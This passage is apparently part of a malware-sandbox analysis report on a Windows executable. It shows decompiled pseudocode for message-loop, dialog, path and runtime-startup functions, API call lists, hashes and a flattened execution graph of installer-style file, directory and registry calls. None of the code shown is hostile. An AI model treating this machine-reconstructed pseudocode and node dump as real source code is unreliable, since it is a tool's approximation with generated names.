                                                                                                                                                                                                                                              							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                              								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t16 = 1;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                              						} while (_t8 != 0);
                                                                                                                                                                                                                                              						if(_t16 == 0) {
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0097369F
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736B2
                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 009736CB
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736DA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2776232527-0
                                                                                                                                                                                                                                              • Opcode ID: 6e1e9282329034d5fa7eb0ba0374f3169e1d6bfc72093f0f6fbfa15d2d5d7a6e
                                                                                                                                                                                                                                              • Instruction ID: 0c5b557e2151508d678a0b17ae25eb2feb4e8eb09e5c83268dc9ce47c7e59f22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e1e9282329034d5fa7eb0ba0374f3169e1d6bfc72093f0f6fbfa15d2d5d7a6e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6201A7739042547BDF304BA65C49FEF767CEBC5F11F10811DF909E2180D561D640E660
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00976517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                              				struct HRSRC__* _t6;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                              				int _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t23 =  *0x979a3c; // 0x970000
                                                                                                                                                                                                                                              				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                                                              					E009744B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t24 = _a16;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                                                              							_push(_a12);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                              						FreeResource(_t21);
                                                                                                                                                                                                                                              						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t24;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00970000,000007D6,00000005), ref: 0097652A
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00970000,00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00976538
                                                                                                                                                                                                                                              • DialogBoxIndirectParamA.USER32(00970000,00000000,00000547,009719E0,00000000), ref: 00976557
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00976560
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1214682469-0
                                                                                                                                                                                                                                              • Opcode ID: 6f0474176b73b5055df1dfd17773b0fb127c9a2de386c2b97e9fe6378e897da3
                                                                                                                                                                                                                                              • Instruction ID: 5b1ad6e20e35f62f6ef7bb29a9d42396b22a4e8e73623362102b3ac0860046e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0474176b73b5055df1dfd17773b0fb127c9a2de386c2b97e9fe6378e897da3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2012673104A05BBDB105F699C08EBB7A6CEBC5761F044125FE0893190D7718C50EAA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                                              			E009765E8(char* __ecx) {
                                                                                                                                                                                                                                              				char _t3;
                                                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                                                              				char* _t12;
                                                                                                                                                                                                                                              				char* _t14;
                                                                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                                                                              				_t15 = __ecx;
                                                                                                                                                                                                                                              				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                              				_t10 = 0;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t3 =  *_t12;
                                                                                                                                                                                                                                              					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                              				} while (_t3 != 0);
                                                                                                                                                                                                                                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                              					if(_t16 <= _t15) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                                                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t16 = _t10;
                                                                                                                                                                                                                                              						_t10 = 1;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(_t16);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return _t10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}










                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00972B33), ref: 00976602
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00976612
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00976629
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00976635
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                              • Opcode ID: 60c0fd238cec049dc5964bdd213232c1cc304b27a6ecc7eaa9a1a13cad575d2e
                                                                                                                                                                                                                                              • Instruction ID: 133d17f33ce0666ffa35e88e580ec8e5809b4e9b81fe9798eadc92f03501c443
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c0fd238cec049dc5964bdd213232c1cc304b27a6ecc7eaa9a1a13cad575d2e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F0F43300C9506EE7321B398C889BBAF9CCBC7755BA941BFE49D82001D6150D469761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009769B0() {
                                                                                                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                                                                                                              				intOrPtr* _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				 *0x9781f8 = E00976C70();
                                                                                                                                                                                                                                              				__set_app_type(E00976FBE(2));
                                                                                                                                                                                                                                              				 *0x9788a4 =  *0x9788a4 | 0xffffffff;
                                                                                                                                                                                                                                              				 *0x9788a8 =  *0x9788a8 | 0xffffffff;
                                                                                                                                                                                                                                              				_t4 = __p__fmode();
                                                                                                                                                                                                                                              				_t11 =  *0x978528; // 0x0
                                                                                                                                                                                                                                              				 *_t4 = _t11;
                                                                                                                                                                                                                                              				_t5 = __p__commode();
                                                                                                                                                                                                                                              				_t12 =  *0x97851c; // 0x0
                                                                                                                                                                                                                                              				 *_t5 = _t12;
                                                                                                                                                                                                                                              				_t6 = E00977000();
                                                                                                                                                                                                                                              				if( *0x978000 == 0) {
                                                                                                                                                                                                                                              					__setusermatherr(E00977000);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E009771EF(_t6);
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00976FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00976FC5
                                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 009769C2
                                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 009769D8
                                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 009769E6
                                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 00976A07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1632413811-0
                                                                                                                                                                                                                                              • Opcode ID: 32a91c6dec600f6bc0dd8719375c74fb8cd90805be0b9b788bd658dc06f933e4
                                                                                                                                                                                                                                              • Instruction ID: e0af6c6ea1522e496f17eb0367d559131190cd6d0845bef0505cc290ff1dd53b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32a91c6dec600f6bc0dd8719375c74fb8cd90805be0b9b788bd658dc06f933e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F0F87356C3019FD718AF70AD0E70A7B61FB84331B108649E46D862F1CF3A85C0EA12
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:28.6%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                              Total number of Nodes:961
                                                                                                                                                                                                                                              Total number of Limit Nodes:26
2625->2611 2626->2619 2627 1a2837 RegQueryValueExA 2626->2627 2628 1a289a RegCloseKey 2627->2628 2629 1a285c 2627->2629 2628->2619 2630 1a2867 ExpandEnvironmentStringsA 2629->2630 2631 1a287a 2629->2631 2630->2631 2631->2628 2633 1a1890 2632->2633 2634 1a1826 GetProcAddress 2632->2634 2635 1a6ce0 4 API calls 2633->2635 2636 1a1889 FreeLibrary 2634->2636 2637 1a1839 AllocateAndInitializeSid 2634->2637 2638 1a189f 2635->2638 2636->2633 2637->2636 2639 1a185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 1a468f 7 API calls 2641->2642 2643 1a51f9 LocalAlloc 2642->2643 2644 1a522d 2643->2644 2645 1a520d 2643->2645 2647 1a468f 7 API calls 2644->2647 2646 1a44b9 20 API calls 2645->2646 2648 1a521e 2646->2648 2649 1a523a 2647->2649 2650 1a6285 GetLastError 2648->2650 2651 1a523e 2649->2651 2652 1a5262 lstrcmpA 2649->2652 2658 1a2f4d 2650->2658 2655 1a44b9 20 API calls 2651->2655 2653 1a527e 2652->2653 2654 1a5272 LocalFree 2652->2654 2656 1a44b9 20 API calls 2653->2656 2654->2658 2657 1a524f LocalFree 2655->2657 2659 1a5290 LocalFree 2656->2659 2657->2658 2658->2438 2658->2439 2658->2444 2659->2658 2661 1a468f 7 API calls 2660->2661 2662 1a5175 2661->2662 2663 1a517a 2662->2663 2664 1a51af 2662->2664 2665 1a44b9 20 API calls 2663->2665 2666 1a468f 7 API calls 2664->2666 2667 1a518d 2665->2667 2668 1a51c0 2666->2668 2667->2441 2822 1a6298 2668->2822 2671 1a51e1 2671->2441 2672 1a44b9 20 API calls 2672->2667 2674 1a468f 7 API calls 2673->2674 2675 1a55c7 LocalAlloc 2674->2675 2676 1a55db 2675->2676 2677 1a55fd 2675->2677 2678 1a44b9 20 API calls 2676->2678 2679 1a468f 7 API calls 2677->2679 2680 1a55ec 2678->2680 2681 1a560a 2679->2681 2682 1a6285 GetLastError 2680->2682 2683 1a560e 2681->2683 2684 1a5632 lstrcmpA 2681->2684 2709 1a55f1 2682->2709 2685 1a44b9 20 API calls 2683->2685 2686 1a564b LocalFree 2684->2686 2687 1a5645 2684->2687 2688 1a561f LocalFree 2685->2688 2689 1a565b 2686->2689 2690 1a5696 2686->2690 2687->2686 2688->2709 2697 1a5467 49 API calls 
2689->2697 2691 1a589f 2690->2691 2692 1a56ae GetTempPathA 2690->2692 2693 1a6517 24 API calls 2691->2693 2695 1a56eb 2692->2695 2696 1a56c3 2692->2696 2693->2709 2694 1a6ce0 4 API calls 2698 1a2f7e 2694->2698 2703 1a586c GetWindowsDirectoryA 2695->2703 2704 1a5717 GetDriveTypeA 2695->2704 2695->2709 2834 1a5467 2696->2834 2700 1a5678 2697->2700 2698->2444 2698->2450 2702 1a44b9 20 API calls 2700->2702 2700->2709 2702->2709 2868 1a597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2707 1a5730 GetFileAttributesA 2704->2707 2714 1a572b 2704->2714 2707->2714 2709->2694 2710 1a597d 34 API calls 2710->2714 2711 1a5467 49 API calls 2711->2695 2712 1a2630 21 API calls 2712->2714 2714->2703 2714->2704 2714->2707 2714->2709 2714->2710 2714->2712 2715 1a57c1 GetWindowsDirectoryA 2714->2715 2716 1a658a CharPrevA 2714->2716 2719 1a5827 SetFileAttributesA 2714->2719 2720 1a5467 49 API calls 2714->2720 2864 1a6952 2714->2864 2715->2714 2717 1a57e8 GetFileAttributesA 2716->2717 2717->2714 2718 1a57fa CreateDirectoryA 2717->2718 2718->2714 2719->2714 2720->2714 2722 1a6268 2721->2722 2723 1a6249 2721->2723 2725 1a597d 34 API calls 2722->2725 2724 1a44b9 20 API calls 2723->2724 2726 1a625a 2724->2726 2730 1a625f 2725->2730 2728 1a6285 GetLastError 2726->2728 2727 1a6ce0 4 API calls 2729 1a3013 2727->2729 2728->2730 2729->2444 2729->2458 2730->2727 2732 1a3b2d 2731->2732 2732->2732 2733 1a3b72 2732->2733 2735 1a3b53 2732->2735 2934 1a4fe0 2733->2934 2736 1a6517 24 API calls 2735->2736 2737 1a3b70 2736->2737 2738 1a6298 10 API calls 2737->2738 2739 1a3b7b 2737->2739 2738->2739 2739->2463 2741 1a2622 2740->2741 2742 1a2583 2740->2742 2961 1a24e0 GetWindowsDirectoryA 2741->2961 2744 1a258b 2742->2744 2745 1a25e8 RegOpenKeyExA 2742->2745 2746 1a25e3 2744->2746 2749 1a259b RegOpenKeyExA 2744->2749 2745->2746 2747 1a2609 RegQueryInfoKeyA 2745->2747 2746->2465 2748 1a25d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1a25bc RegQueryValueExA 2749->2750 2750->2748 2752 1a3bdb 
2751->2752 2764 1a3bec 2751->2764 2753 1a468f 7 API calls 2752->2753 2753->2764 2754 1a3c03 memset 2754->2764 2755 1a3d13 2757 1a44b9 20 API calls 2755->2757 2756 1a468f 7 API calls 2756->2764 2763 1a3d26 2757->2763 2759 1a6ce0 4 API calls 2760 1a3f60 2759->2760 2760->2471 2761 1a3fd7 2761->2763 3060 1a2267 2761->3060 2762 1a3d7b CompareStringA 2762->2761 2762->2764 2763->2759 2764->2754 2764->2755 2764->2756 2764->2761 2764->2762 2764->2763 2765 1a3fab 2764->2765 2769 1a3f1e LocalFree 2764->2769 2770 1a3f46 LocalFree 2764->2770 2774 1a3cc7 CompareStringA 2764->2774 2785 1a3e10 2764->2785 2969 1a1ae8 2764->2969 3010 1a202a memset memset RegCreateKeyExA 2764->3010 3036 1a3fef 2764->3036 2768 1a44b9 20 API calls 2765->2768 2772 1a3fbe LocalFree 2768->2772 2769->2761 2769->2764 2770->2763 2772->2763 2774->2764 2775 1a3e1f GetProcAddress 2777 1a3f64 2775->2777 2775->2785 2776 1a3f92 2778 1a44b9 20 API calls 2776->2778 2780 1a44b9 20 API calls 2777->2780 2779 1a3fa9 2778->2779 2781 1a3f7c LocalFree 2779->2781 2782 1a3f75 FreeLibrary 2780->2782 2783 1a6285 GetLastError 2781->2783 2782->2781 2784 1a3f8b 2783->2784 2784->2763 2785->2775 2785->2776 2786 1a3eff FreeLibrary 2785->2786 2787 1a3f40 FreeLibrary 2785->2787 3050 1a6495 2785->3050 2786->2769 2787->2770 2789 1a468f 7 API calls 2788->2789 2790 1a3a55 LocalAlloc 2789->2790 2791 1a3a8e 2790->2791 2792 1a3a6c 2790->2792 2794 1a468f 7 API calls 2791->2794 2793 1a44b9 20 API calls 2792->2793 2795 1a3a7d 2793->2795 2796 1a3a98 2794->2796 2797 1a6285 GetLastError 2795->2797 2798 1a3a9c 2796->2798 2799 1a3ac5 lstrcmpA 2796->2799 2800 1a2f64 2797->2800 2801 1a44b9 20 API calls 2798->2801 2802 1a3ada 2799->2802 2803 1a3b0d LocalFree 2799->2803 2800->2438 2800->2444 2805 1a3aad LocalFree 2801->2805 2804 1a6517 24 API calls 2802->2804 2803->2800 2806 1a3aec LocalFree 2804->2806 2805->2800 2806->2800 2808 1a628f 2807->2808 2808->2444 2810 1a468f 7 API calls 2809->2810 2811 1a417d LocalAlloc 2810->2811 2812 1a41a8 2811->2812 2813 
1a4195 2811->2813 2815 1a468f 7 API calls 2812->2815 2814 1a44b9 20 API calls 2813->2814 2816 1a41a6 2814->2816 2817 1a41b5 2815->2817 2816->2444 2818 1a41b9 2817->2818 2819 1a41c5 lstrcmpA 2817->2819 2821 1a44b9 20 API calls 2818->2821 2819->2818 2820 1a41e6 LocalFree 2819->2820 2820->2816 2821->2820 2823 1a171e _vsnprintf 2822->2823 2824 1a62c9 FindResourceA 2823->2824 2826 1a62cb LoadResource LockResource 2824->2826 2827 1a6353 2824->2827 2826->2827 2830 1a62e0 2826->2830 2828 1a6ce0 4 API calls 2827->2828 2829 1a51ca 2828->2829 2829->2671 2829->2672 2831 1a631b FreeResource 2830->2831 2832 1a6355 FreeResource 2830->2832 2833 1a171e _vsnprintf 2831->2833 2832->2827 2833->2824 2835 1a548a 2834->2835 2836 1a551a 2834->2836 2894 1a53a1 2835->2894 2905 1a58c8 2836->2905 2838 1a5495 2847 1a5581 2838->2847 2848 1a550c 2838->2848 2849 1a54c2 GetSystemInfo 2838->2849 2841 1a553b CreateDirectoryA 2845 1a5577 2841->2845 2846 1a5547 2841->2846 2842 1a554d 2842->2847 2850 1a597d 34 API calls 2842->2850 2843 1a6ce0 4 API calls 2844 1a559a 2843->2844 2844->2709 2858 1a2630 GetWindowsDirectoryA 2844->2858 2851 1a6285 GetLastError 2845->2851 2846->2842 2847->2843 2852 1a658a CharPrevA 2848->2852 2856 1a54da 2849->2856 2853 1a555c 2850->2853 2854 1a557c 2851->2854 2852->2836 2853->2847 2857 1a5568 RemoveDirectoryA 2853->2857 2854->2847 2855 1a658a CharPrevA 2855->2848 2856->2848 2856->2855 2857->2847 2859 1a265e 2858->2859 2860 1a266f 2858->2860 2861 1a44b9 20 API calls 2859->2861 2862 1a6ce0 4 API calls 2860->2862 2861->2860 2863 1a2687 2862->2863 2863->2695 2863->2711 2865 1a696e GetDiskFreeSpaceA 2864->2865 2866 1a69a1 2864->2866 2865->2866 2867 1a6989 MulDiv 2865->2867 2866->2714 2867->2866 2869 1a59bb 2868->2869 2870 1a59dd GetDiskFreeSpaceA 2868->2870 2871 1a44b9 20 API calls 2869->2871 2872 1a5ba1 memset 2870->2872 2873 1a5a21 MulDiv 2870->2873 2874 1a59cc 2871->2874 2875 1a6285 GetLastError 2872->2875 2873->2872 2876 1a5a50 GetVolumeInformationA 2873->2876 2877 1a6285 
GetLastError 2874->2877 2878 1a5bbc GetLastError FormatMessageA 2875->2878 2879 1a5a6e memset 2876->2879 2880 1a5ab5 SetCurrentDirectoryA 2876->2880 2881 1a59d1 2877->2881 2882 1a5be3 2878->2882 2883 1a6285 GetLastError 2879->2883 2888 1a5acc 2880->2888 2887 1a6ce0 4 API calls 2881->2887 2884 1a44b9 20 API calls 2882->2884 2885 1a5a89 GetLastError FormatMessageA 2883->2885 2886 1a5bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2889 1a5c11 2887->2889 2890 1a5b0a 2888->2890 2892 1a5b20 2888->2892 2889->2695 2891 1a44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 1a268b 2892->2917 2896 1a53bf 2894->2896 2895 1a171e _vsnprintf 2895->2896 2896->2895 2897 1a658a CharPrevA 2896->2897 2900 1a5415 GetTempFileNameA 2896->2900 2898 1a53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 1a544f CreateDirectoryA 2898->2899 2899->2900 2901 1a543a 2899->2901 2900->2901 2902 1a5429 DeleteFileA CreateDirectoryA 2900->2902 2903 1a6ce0 4 API calls 2901->2903 2902->2901 2904 1a5449 2903->2904 2904->2838 2906 1a58d8 2905->2906 2906->2906 2907 1a58df LocalAlloc 2906->2907 2908 1a5919 2907->2908 2909 1a58f3 2907->2909 2912 1a658a CharPrevA 2908->2912 2910 1a44b9 20 API calls 2909->2910 2911 1a5906 2910->2911 2913 1a6285 GetLastError 2911->2913 2915 1a5534 2911->2915 2914 1a5931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 1a595b CloseHandle GetFileAttributesA 2914->2916 2915->2841 2915->2842 2916->2911 2918 1a26b9 2917->2918 2919 1a26e5 2917->2919 2922 1a171e _vsnprintf 2918->2922 2920 1a26ea 2919->2920 2921 1a271f 2919->2921 2923 1a171e _vsnprintf 2920->2923 2924 1a26e3 2921->2924 2927 1a171e _vsnprintf 2921->2927 2925 1a26cc 2922->2925 2926 1a26fd 2923->2926 2928 1a6ce0 4 API calls 2924->2928 2929 1a44b9 20 API calls 2925->2929 2931 1a44b9 20 API calls 2926->2931 2932 1a2735 2927->2932 2930 1a276d 2928->2930 2929->2924 2930->2881 2931->2924 2933 1a44b9 20 API calls 2932->2933 2933->2924 2935 1a468f 7 API calls 2934->2935 2936 1a4ff5 
FindResourceA LoadResource LockResource 2935->2936 2937 1a5020 2936->2937 2949 1a515f 2936->2949 2938 1a5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2938 2939 1a5057 2937->2939 2938->2939 2953 1a4efd 2939->2953 2942 1a507c 2947 1a44b9 20 API calls 2942->2947 2948 1a5075 2942->2948 2943 1a5060 2944 1a44b9 20 API calls 2943->2944 2944->2948 2945 1a511d 2950 1a513a 2945->2950 2951 1a44b9 20 API calls 2945->2951 2946 1a5110 FreeResource 2946->2945 2947->2948 2948->2945 2948->2946 2949->2737 2950->2949 2952 1a514c SendMessageA 2950->2952 2951->2950 2952->2949 2954 1a4f4a 2953->2954 2955 1a4980 25 API calls 2954->2955 2960 1a4fa1 2954->2960 2958 1a4f67 2955->2958 2956 1a6ce0 4 API calls 2957 1a4fc6 2956->2957 2957->2942 2957->2943 2959 1a4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 1a255b 2961->2962 2963 1a2510 2961->2963 2964 1a6ce0 4 API calls 2962->2964 2965 1a658a CharPrevA 2963->2965 2966 1a2569 2964->2966 2967 1a2522 WritePrivateProfileStringA _lopen 2965->2967 2966->2746 2967->2962 2968 1a2548 _llseek _lclose 2967->2968 2968->2962 2970 1a1b25 2969->2970 3074 1a1a84 2970->3074 2972 1a1b57 2973 1a658a CharPrevA 2972->2973 2975 1a1b8c 2972->2975 2973->2975 2974 1a66c8 2 API calls 2976 1a1bd1 2974->2976 2975->2974 2977 1a1bd9 CompareStringA 2976->2977 2978 1a1d73 2976->2978 2977->2978 2979 1a1bf7 GetFileAttributesA 2977->2979 2980 1a66c8 2 API calls 2978->2980 2981 1a1c0d 2979->2981 2982 1a1d53 2979->2982 2983 1a1d7d 2980->2983 2981->2982 2989 1a1a84 2 API calls 2981->2989 2984 1a1d64 2982->2984 2985 1a1df8 LocalAlloc 2983->2985 2986 1a1d81 CompareStringA 2983->2986 2987 1a44b9 20 API calls 2984->2987 2985->2984 2988 1a1e0b GetFileAttributesA 2985->2988 2986->2985 2994 1a1d9b 2986->2994 2990 1a1d6c 2987->2990 2997 1a1e1d 2988->2997 3005 1a1e45 2988->3005 2991 1a1c31 2989->2991 2993 1a6ce0 4 API calls 2990->2993 2992 1a1c50 LocalAlloc 2991->2992 2998 1a1a84 2 API calls 2991->2998 2992->2984 2995 1a1c67 
